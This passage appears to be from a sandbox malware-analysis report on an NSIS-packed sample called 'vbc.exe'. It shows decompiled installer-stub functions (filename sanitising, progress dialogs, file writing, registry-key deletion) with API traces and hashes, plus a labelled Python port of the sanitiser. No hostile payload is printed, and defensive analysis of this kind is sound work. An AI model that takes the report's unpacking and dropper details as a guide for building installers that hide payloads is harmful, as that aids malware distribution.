                                                        						}
                                                        						_t20 = CharNextW(_t20);
                                                        						_t5 =  *_t20;
                                                        					} while (_t5 != 0);
                                                        				}
                                                        				 *_t19 =  *_t19 & 0x00000000;    // NUL-terminate the compacted string
                                                        				// walk back with CharPrevW(_t21, _t19) and cut trailing ' ' (0x20) and '\' (0x5c)
                                                        				while(1) {
                                                        					_push(_t19);
                                                        					_push(_t21);
                                                        					_t19 = CharPrevW();
                                                        					_t7 =  *_t19;
                                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                        						break;
                                                        					}
                                                        					 *_t19 =  *_t19 & 0x00000000;
                                                        					if(_t21 < _t19) {
                                                        						continue;
                                                        					}
                                                        					break;
                                                        				}
                                                        				return _t7;
                                                        			}








                                                        Statement addresses (side column of the decompiled listing; 0x00000000 where no address was recorded): 0x004068f7 0x00406900 0x00406917 0x00406917 0x0040691e 0x0040692a 0x0040692a 0x0040692d 0x00406930 0x00406935 0x00406937 0x00406940 0x00406944 0x00406961 0x00406969 0x00406969 0x0040696e 0x00406970 0x00406973 0x00406978 0x00406979 0x0040697d 0x0040697d 0x0040697e 0x00406985 0x00406987 0x0040698e 0x00000000 0x00000000 0x00406996 0x0040699c 0x00000000 0x00000000 0x00000000 0x0040699c 0x004069a1
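The sanitiser E004068F5 above, re-implemented in Python as an added example (not code from the report or from the sample), so that the name a given input path is reduced to can be checked offline, for instance when matching a configured path against a file the installer actually dropped. E00405FB4 is not shown on the page; the path-spec test below is an assumption taken from its call site, and the `> 0x1f` comparison is ported literally from the decompiled `short` type.

```python
"""Port of the filename sanitiser E004068F5 from the decompiled stub above.

Added example, not code from the report or the sample. The callees E00405FB4,
E00405F6A and E00406119 are not shown on the page; their roles (path-spec test,
find-char, memcpy) are inferred from how E004068F5 uses them and are assumptions.
"""
import string
from typing import List

ILLEGAL = '*?|<>/":'  # the L"*?|<>/\":" set E004068F5 hands to E00405F6A


def _is_pathspec(units: List[int]) -> bool:
    """Assumed behaviour of E00405FB4 (body not on the page): true when the
    string opens with a UNC '\\\\' or an ASCII drive letter followed by ':'."""
    if len(units) < 2:
        return False
    a, b = units[0], units[1]
    if a == 0x5C and b == 0x5C:
        return True
    return chr(a) in string.ascii_letters and b == 0x3A


def validate_filename(path: str) -> str:
    """Return the string E004068F5 would leave in its WCHAR buffer."""
    # The routine walks WCHARs with CharNextW/CharPrevW, so work on UTF-16 units.
    raw = path.encode('utf-16-le', 'surrogatepass')
    units = [int.from_bytes(raw[i:i + 2], 'little') for i in range(0, len(raw), 2)]

    # 1. Drop a leading "\\?\" (0x5c 0x5c 0x3f 0x5c) extended-length prefix.
    if units[:4] == [0x5C, 0x5C, 0x3F, 0x5C]:
        units = units[4:]
    # 2. Drop a two-unit path spec ("C:" or "\\") if E00405FB4 would accept it.
    if units and _is_pathspec(units):
        units = units[2:]
    # 3. Keep a unit only if the decompiled test `_t5 > 0x1f` passes and it is not
    #    in ILLEGAL. _t5 is typed `short`, so taken literally the compare also
    #    rejects units >= 0x8000; whether the real jump is signed is not visible.
    kept = []
    for u in units:
        as_short = u - 0x10000 if u >= 0x8000 else u
        if as_short > 0x1F and chr(u) not in ILLEGAL:
            kept.append(u)
    # 4. The CharPrevW loop: strip trailing spaces and backslashes.
    while kept and kept[-1] in (0x20, 0x5C):
        kept.pop()
    out = b''.join(u.to_bytes(2, 'little') for u in kept)
    return out.decode('utf-16-le', 'surrogatepass')


if __name__ == '__main__':
    # Constructed inputs, including the Temp path quoted in this report's API log.
    for sample in (r'\\?\C:\Users\user\AppData\Local\Temp\yldnat.exe',
                   'C:\\Temp\\bad<name>?.exe  \\', 'a\x01b\tc'):
        print(repr(sample), '->', repr(validate_filename(sample)))
```

Note that an absolute Windows path comes back relative: the drive spec is cut before the character filter runs, backslashes are not in the illegal set, and only a trailing run of spaces and backslashes is trimmed.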

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-3083651966
                                                        • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                        • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
                                                        • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                        • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			// Verify/unpack progress handler. With _a4 != 0 it destroys the progress
                                                        			// dialog; otherwise it pumps messages for an existing dialog (E00406A77) or,
                                                        			// once the tick deadline has passed, creates the dialog (template 0x6f,
                                                        			// dialog proc E00402F93) or, with the status-update flag set, writes
                                                        			// "... %d%%" to the install status line (E004056D0). E00403012 returns the
                                                        			// percentage via MulDiv. Matches NSIS handle_ver_dlg() (exehead/fileform.c).
                                                        			E0040302E(intOrPtr _a4) {
                                                        				short _v132;
                                                        				long _t6;
                                                        				struct HWND__* _t7;
                                                        				struct HWND__* _t15;
                                                        
                                                        				if(_a4 != 0) {
                                                        					_t15 =  *0x79f73c;    // HWND of the progress dialog, if any
                                                        					if(_t15 != 0) {
                                                        						_t15 = DestroyWindow(_t15);
                                                        					}
                                                        					 *0x79f73c = 0;
                                                        					return _t15;
                                                        				}
                                                        				if( *0x79f73c != 0) {
                                                        					return E00406A77(0);    // dialog already up: run the message loop
                                                        				}
                                                        				_t6 = GetTickCount();
                                                        				if(_t6 >  *0x7a8aac) {    // only show progress once a tick-count deadline has passed
                                                        					if( *0x7a8aa8 == 0) {
                                                        						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
                                                        						 *0x79f73c = _t7;
                                                        						return ShowWindow(_t7, 5);    // SW_SHOW
                                                        					}
                                                        					if(( *0x7a8b54 & 0x00000001) != 0) {    // status-update flag
                                                        						wsprintfW( &_v132, L"... %d%%", E00403012());
                                                        						return E004056D0(0,  &_v132);
                                                        					}
                                                        				}
                                                        				return _t6;
                                                        			}







                                                        Statement addresses (side column of the decompiled listing; 0x00000000 where no address was recorded): 0x0040303d 0x0040303f 0x00403046 0x00403049 0x00403049 0x0040304f 0x00000000 0x0040304f 0x0040305d 0x00000000 0x00403060 0x00403067 0x00403073 0x0040307b 0x004030b9 0x004030c2 0x00000000 0x004030c7 0x00403084 0x00403095 0x00000000 0x004030a3 0x00403084 0x004030cf

                                                        APIs
                                                        • DestroyWindow.USER32 ref: 00403049
                                                        • GetTickCount.KERNEL32(00000000), ref: 00403067
                                                        • wsprintfW.USER32 ref: 00403095
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                                          • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                                          • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                                        • CreateDialogParamW.USER32 ref: 004030B9
                                                        • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                          • Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 722711167-2449383134
                                                        • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                                                        • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
                                                        • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                                                        • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			// Returns the lParam (section index) of a tree-view item on the components page:
                                                        			// the selected item, or, with _a8 != 0, the item under the mouse. Returns -1 when
                                                        			// the cursor is not on an item. Matches NSIS TreeGetSelectedSection() (exehead/ui.c).
                                                        			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
                                                        				long _v8;               // TVHITTESTINFO.hItem
                                                        				signed char _v12;       // TVHITTESTINFO.flags
                                                        				unsigned int _v16;      // TVHITTESTINFO.pt.y
                                                        				void* _v20;             // TVHITTESTINFO.pt.x
                                                        				intOrPtr _v24;          // TVITEMW.lParam
                                                        				long _v56;              // TVITEMW.hItem
                                                        				void* _v60;             // TVITEMW.mask
                                                        				long _t15;
                                                        				unsigned int _t19;
                                                        				signed int _t25;
                                                        				struct HWND__* _t28;
                                                        
                                                        				_t28 = _a4;
                                                        				_t15 = SendMessageW(_t28, 0x110a, 9, 0);    // TVM_GETNEXTITEM, TVGN_CARET: the selected item
                                                        				if(_a8 == 0) {
                                                        					L4:
                                                        					_v56 = _t15;
                                                        					_v60 = 4;                                    // TVIF_PARAM
                                                        					SendMessageW(_t28, 0x113e, 0,  &_v60);       // TVM_GETITEMW
                                                        					return _v24;
                                                        				}
                                                        				_t19 = GetMessagePos();                          // packed screen x/y of the last message
                                                        				_v16 = _t19 >> 0x10;
                                                        				_v20 = _t19;
                                                        				ScreenToClient(_t28,  &_v20);
                                                        				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);    // TVM_HITTEST
                                                        				// 0x66 = TVHT_ONITEMICON | TVHT_ONITEMLABEL | TVHT_ONITEMRIGHT | TVHT_ONITEMSTATEICON
                                                        				if((_v12 & 0x00000066) != 0) {
                                                        					_t15 = _v8;
                                                        					goto L4;
                                                        				}
                                                        				return _t25 | 0xffffffff;    // -1: not on an item
                                                        			}














                                                        Statement addresses (side column of the decompiled listing; 0x00000000 where no address was recorded): 0x00404f93 0x00404fa0 0x00404fa6 0x00404fe4 0x00404fe4 0x00404ff3 0x00404ffa 0x00000000 0x00404ffc 0x00404fa8 0x00404fb7 0x00404fbf 0x00404fc2 0x00404fd4 0x00404fda 0x00404fe1 0x00000000 0x00404fe1 0x00000000

                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
                                                        • GetMessagePos.USER32 ref: 00404FA8
                                                        • ScreenToClient.USER32(?,?), ref: 00404FC2
                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                        • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
                                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                        • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			// Dialog procedure of the verify/unpack progress dialog created by E0040302E.
                                                        			// Matches NSIS verProc() (exehead/fileform.c).
                                                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                                                        				short _v132;
                                                        				void* _t11;
                                                        				WCHAR* _t19;
                                                        
                                                        				if(_a8 == 0x110) {                  // WM_INITDIALOG
                                                        					SetTimer(_a4, 1, 0xfa, 0);      // timer 1, 250 ms
                                                        					_a8 = 0x113;                    // then handle as WM_TIMER
                                                        				}
                                                        				if(_a8 == 0x113) {                  // WM_TIMER
                                                        					_t11 = E00403012();             // percentage (MulDiv)
                                                        					_t19 = L"unpacking data: %d%%";
                                                        					if( *0x7a8ab0 == 0) {           // global flag: zero while the installer is still being verified
                                                        						_t19 = L"verifying installer: %d%%";
                                                        					}
                                                        					wsprintfW( &_v132, _t19, _t11);
                                                        					SetWindowTextW(_a4,  &_v132);           // dialog title
                                                        					SetDlgItemTextW(_a4, 0x406,  &_v132);   // text control 0x406 (1030)
                                                        				}
                                                        				return 0;
                                                        			}






                                                        Statement addresses (side column of the decompiled listing): 0x00402fa3 0x00402fb1 0x00402fb7 0x00402fb7 0x00402fc5 0x00402fc7 0x00402fd3 0x00402fd8 0x00402fda 0x00402fda 0x00402fe5 0x00402ff5 0x00403007 0x00403007 0x0040300f

                                                        APIs
                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                        • wsprintfW.USER32 ref: 00402FE5
                                                        • SetWindowTextW.USER32 ref: 00402FF5
                                                        • SetDlgItemTextW.USER32 ref: 00403007
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                        • API String ID: 1451636040-1158693248
                                                        • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                                                        • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
                                                        • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                                                        • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 93%
                                                        			E00402950(void* __ebx) {
                                                        				WCHAR* _t26;
                                                        				void* _t29;
                                                        				long _t37;
                                                        				void* _t49;
                                                        				void* _t52;
                                                        				void* _t54;
                                                        				void* _t56;
                                                        				void* _t59;
                                                        				void* _t60;
                                                        				void* _t61;
                                                        
                                                        				_t49 = __ebx;
                                                        				_t52 = 0xfffffd66;
                                                        				_t26 = E00402DA6(0xfffffff0);
                                                        				_t55 = _t26;
                                                        				 *(_t61 - 0x40) = _t26;
                                                        				if(E00405FB4(_t26) == 0) {
                                                        					E00402DA6(0xffffffed);
                                                        				}
                                                        				E00406139(_t55);
                                                        				_t29 = E0040615E(_t55, 0x40000000, 2);
                                                        				 *(_t61 + 8) = _t29;
                                                        				if(_t29 != 0xffffffff) {
                                                        					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                                                        					if( *(_t61 - 0x28) != _t49) {
                                                        						_t37 =  *0x7a8ab4;
                                                        						 *(_t61 - 0x44) = _t37;
                                                        						_t54 = GlobalAlloc(0x40, _t37);
                                                        						if(_t54 != _t49) {
                                                        							E004035FE(_t49);
                                                        							E004035E8(_t54,  *(_t61 - 0x44));
                                                        							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                                        							 *(_t61 - 0x10) = _t59;
                                                        							if(_t59 != _t49) {
                                                        								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                                        								while( *_t59 != _t49) {
                                                        									_t51 =  *_t59;
                                                        									_t60 = _t59 + 8;
                                                        									 *(_t61 - 0x3c) =  *_t59;
                                                        									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                        									_t59 = _t60 +  *(_t61 - 0x3c);
                                                        								}
                                                        								GlobalFree( *(_t61 - 0x10));
                                                        							}
                                                        							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                                        							GlobalFree(_t54);
                                                        							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                                        						}
                                                        					}
                                                        					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                                        					CloseHandle( *(_t61 + 8));
                                                        				}
                                                        				_t56 = 0xfffffff3;
                                                        				if(_t52 < _t49) {
                                                        					_t56 = 0xffffffef;
                                                        					DeleteFileW( *(_t61 - 0x40));
                                                        					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                        				}
                                                        				_push(_t56);
                                                        				E00401423();
                                                        				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
                                                        				return 0;
                                                        			}













                                                        Instruction addresses (one per decompiled line, in listing order): 0x00402950, 0x00402952, 0x00402957, 0x0040295c, 0x0040295f, 0x00402969, 0x0040296d, 0x0040296d, 0x00402973, 0x00402980, 0x00402988, 0x0040298b, 0x00402997, 0x0040299a, 0x004029a0, 0x004029ae, 0x004029b3, 0x004029b7, 0x004029ba, 0x004029c3, 0x004029cf, 0x004029d3, 0x004029d6, 0x004029e0, 0x004029ff, 0x004029e7, 0x004029ec, 0x004029f4, 0x004029f7, 0x004029fc, 0x004029fc, 0x00402a06, 0x00402a06, 0x00402a13, 0x00402a19, 0x00402a1f, 0x00402a1f, 0x004029b7, 0x00402a33, 0x00402a35, 0x00402a35, 0x00402a3f, 0x00402a40, 0x00402a44, 0x00402a48, 0x00402a4e, 0x00402a4e, 0x00402a55, 0x004022f1, 0x00402c2d, 0x00402c39

                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                        • GlobalFree.KERNEL32(?), ref: 00402A06
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                        • CloseHandle.KERNEL32(?), ref: 00402A35
                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                                                        • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
                                                        • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                                                        • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 48%
                                                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                        				void* _v8;
                                                        				int _v12;
                                                        				short _v536;
                                                        				void* _t27;
                                                        				signed int _t33;
                                                        				intOrPtr* _t35;
                                                        				signed int _t45;
                                                        				signed int _t46;
                                                        				signed int _t47;
                                                        
                                                        				_t46 = _a12;
                                                        				_t47 = _t46 & 0x00000300;
                                                        				_t45 = _t46 & 0x00000001;
                                                        				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                        				if(_t27 == 0) {
                                                        					if((_a12 & 0x00000002) == 0) {
                                                        						L3:
                                                        						_push(0x105);
                                                        						_push( &_v536);
                                                        						_push(0);
                                                        						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                        							__eflags = _t45;
                                                        							if(__eflags != 0) {
                                                        								L10:
                                                        								RegCloseKey(_v8);
                                                        								return 0x3eb;
                                                        							}
                                                        							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                        							__eflags = _t33;
                                                        							if(_t33 != 0) {
                                                        								break;
                                                        							}
                                                        							_push(0x105);
                                                        							_push( &_v536);
                                                        							_push(_t45);
                                                        						}
                                                        						RegCloseKey(_v8);
                                                        						_t35 = E00406A3B(3);
                                                        						if(_t35 != 0) {
                                                        							return  *_t35(_a4, _a8, _t47, 0);
                                                        						}
                                                        						return RegDeleteKeyW(_a4, _a8);
                                                        					}
                                                        					_v12 = 0;
                                                        					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                        						goto L10;
                                                        					}
                                                        					goto L3;
                                                        				}
                                                        				return _t27;
                                                        			}












                                                        Instruction addresses (one per decompiled line, in listing order; 0x00000000 marks lines with no mapped address): 0x00402eb4, 0x00402ebd, 0x00402ec6, 0x00402ed2, 0x00402edb, 0x00402ee5, 0x00402f0a, 0x00402f10, 0x00402f15, 0x00402f16, 0x00402f46, 0x00402f1f, 0x00402f21, 0x00402f71, 0x00402f74, 0x00000000, 0x00402f7a, 0x00402f30, 0x00402f35, 0x00402f37, 0x00000000, 0x00000000, 0x00402f3f, 0x00402f44, 0x00402f45, 0x00402f45, 0x00402f52, 0x00402f5a, 0x00402f61, 0x00000000, 0x00402f8a, 0x00000000, 0x00402f69, 0x00402ef5, 0x00402f08, 0x00000000, 0x00000000, 0x00000000, 0x00402f08, 0x00402f90

                                                        APIs
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                        • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
